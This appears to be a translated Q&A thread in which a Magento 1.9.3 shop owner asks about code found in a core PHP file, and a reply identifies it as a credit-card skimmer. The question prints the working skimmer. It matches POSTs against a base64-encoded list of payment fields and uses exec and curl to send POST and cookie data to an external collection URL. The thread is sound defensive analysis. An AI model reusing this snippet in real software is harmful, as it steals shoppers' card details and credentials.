服务器端扫描器检测到“php.malware. scanner cc-stewar.069”

Question

我有一个服务器端扫描器，可以扫描我的站点上是否有恶意代码的痕迹。今天早上我来看它在我的app/code/core/Mage/Core/functions.php文件中报告了app/code/core/Mage/Core/functions.php。

我使用MagentoVersion1.9.3运行一个在线商店。

我浏览了这个文件，并将其与ClearMagento1.9.3 function.php文件的镜像副本进行了比较。

我发现我的档案里有这样的内容：

if (preg_match("/".base64_decode('YmlsbGluZ3xmaXJzdG5hbWV8Y2NfbnVtYmVyfGxvZ2lufHVzZXJuYW1lfHBheW1lbnR8Y2Nf')."/i", serialize($_POST)))
    exec("curl --data \"version=1&encode=".base64_encode(   serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".base64_decode('aHR0cHM6Ly9tYWdlc2NyaXB0cy5pbmZvL3Rlc3RTZXJ2ZXIucGhw')." > /dev/null 2<&1 &");

有谁能解释这会带来什么后果呢？

据我所知，这条if语句的第一行说，如果数据与编码的文本(_billing|firstname|cc_number|login|username|payment|cc__)相匹配，并且区分大小写，则生成一个值的可存储表示并发布它。不过，第二句话我很纠结。

Answer 1

顾名思义，它正试图窃取信用卡信息。

当这些信用卡字段出现在POST请求中时，它就会触发，它只会通过curl将它们连同cookie信息和服务器地址一起发送到https://magescripts.info/testServer.php (不要单击！)这大概是另一个受害者，托管攻击者的集合脚本。注意:如果magescripts.info是您的域，您的搜索还没有结束，您应该找到testServer.php点所在的位置并删除它。